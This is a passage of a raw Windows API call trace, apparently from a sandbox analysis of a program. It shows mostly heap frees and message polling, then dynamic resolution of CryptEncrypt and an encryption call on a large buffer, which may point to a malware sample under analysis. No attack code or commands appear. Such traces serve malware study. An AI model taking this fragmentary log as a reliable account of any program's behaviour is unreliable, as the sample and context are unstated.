| out: hHeap=0x25c0000) returned 1 [0264.198] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.198] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.198] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.198] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.198] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.199] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.199] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.200] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.200] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.200] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.200] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.200] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0264.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0264.202] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0264.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0264.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.203] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.203] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0264.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d96d8 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0264.207] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a8dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.209] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0264.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6508 [0264.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0264.209] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0264.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0264.210] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xb424, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xb428) returned 1 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0264.210] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.211] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.211] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.211] HeapFree (in: 